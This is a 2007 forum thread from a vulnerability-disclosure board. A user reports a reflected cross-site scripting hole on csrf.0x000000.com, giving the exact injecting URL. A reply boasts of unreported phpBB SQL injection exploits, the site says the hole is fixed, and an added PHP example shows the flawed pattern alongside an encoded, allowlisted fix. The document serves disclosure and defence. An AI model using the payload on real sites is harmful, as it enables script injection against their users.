Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
XSS - csrf.0x000000.com
Posted by: Ras
Date: November 04, 2007 03:37PM

Yesterday I found this vuln and Nemessis told me to post here :P
Go to: http://www.0x000000.com/
Click on: "csrf database"
Then in the Search box write: Ras
Our link is like this:
http://csrf.0x000000.com/csrfdb.php?do=browse&order=searchstring
Delete "searchstring" and then put
"><script>alert(/Ras-www.rstzone.org/)</script>

http://csrf.0x000000.com/csrfdb.php?do=browse&order="><script>alert(/Ras-www.rstzone.org/)</script>

Works on: IE 7, Opera, Firefox :P

Sorry for my bad English!
-Ras



Edited 2 time(s). Last edit at 11/04/2007 04:01PM by Ronald.

Re: XSS - http://www.0x000000.com/
Posted by: Anonymous User
Date: November 04, 2007 04:00PM

Yep useless bullshit on a subdomain I did not create, Ryan did.
Want an award? Come and get it personally.

Go here: browserfry.0x000000.com A lot more 1337 XSS holes for you.

Re: XSS - csrf.0x000000.com
Posted by: Anonymous User
Date: November 04, 2007 04:02PM

And shut up while you guys at RST use PHPBB, I got some real exploits lying around for PHPBB3.0 (SQL injection) which the authors of PHPBB don't know about yet. You guys are vulnerable before you even realize it. That's ownage, owning without even trying, so watch out when you upgrade to PHPBB3.0

Re: XSS - csrf.0x000000.com
Posted by: nemessis
Date: November 04, 2007 05:43PM

Ronald you have a private message. Thank you.

Re: XSS - csrf.0x000000.com
Posted by: tehryan
Date: November 04, 2007 09:18PM

Fixed, Thanks.

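The report in this thread is a query parameter (`order`) reflected into the page without output encoding. The following is an added example, not the site's code and not posted by anyone in the thread, showing that pattern next to a hardened form. The column names, the function names and the assumption that the value lands in an HTML attribute are hypothetical.

```php
<?php
// Added example: hypothetical handling of an `order` query parameter.
// Column names and function names are assumptions, not the site's code.

const ALLOWED_ORDER = ['id', 'title', 'date']; // assumed sortable columns

// Vulnerable pattern: the request value is copied into an attribute as-is,
// so a value starting with "> closes the attribute and the tag.
function render_order_field_vulnerable($raw): string
{
    return '<input type="hidden" name="order" value="' . $raw . '">';
}

// Step 1: allowlist. `order` only ever needs to name a known column, so
// anything else (including arrays from order[]=x) falls back to a default.
function normalize_order($raw, string $default = 'id'): string
{
    return (is_string($raw) && in_array($raw, ALLOWED_ORDER, true)) ? $raw : $default;
}

// Step 2: encode for the HTML attribute context on output, even though the
// value is already allowlisted, so the template stays safe if the list changes.
function render_order_field($raw): string
{
    $order = htmlspecialchars(normalize_order($raw), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="order" value="' . $order . '">';
}

// Free-text values (such as a search box) cannot be allowlisted; encode them.
function render_search_echo($raw): string
{
    $text = is_string($raw) ? $raw : '';
    return '<p>Results for: ' . htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// Constructed inputs, standing in for $_GET['order'] and a search term.
$samples = ['date', '"><script>alert(1)</script>', ['nested']];
foreach ($samples as $s) {
    echo render_order_field($s), "\n";   // always a known column name
}
echo render_search_echo('"><script>alert(1)</script>'), "\n"; // markup arrives as inert text
```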

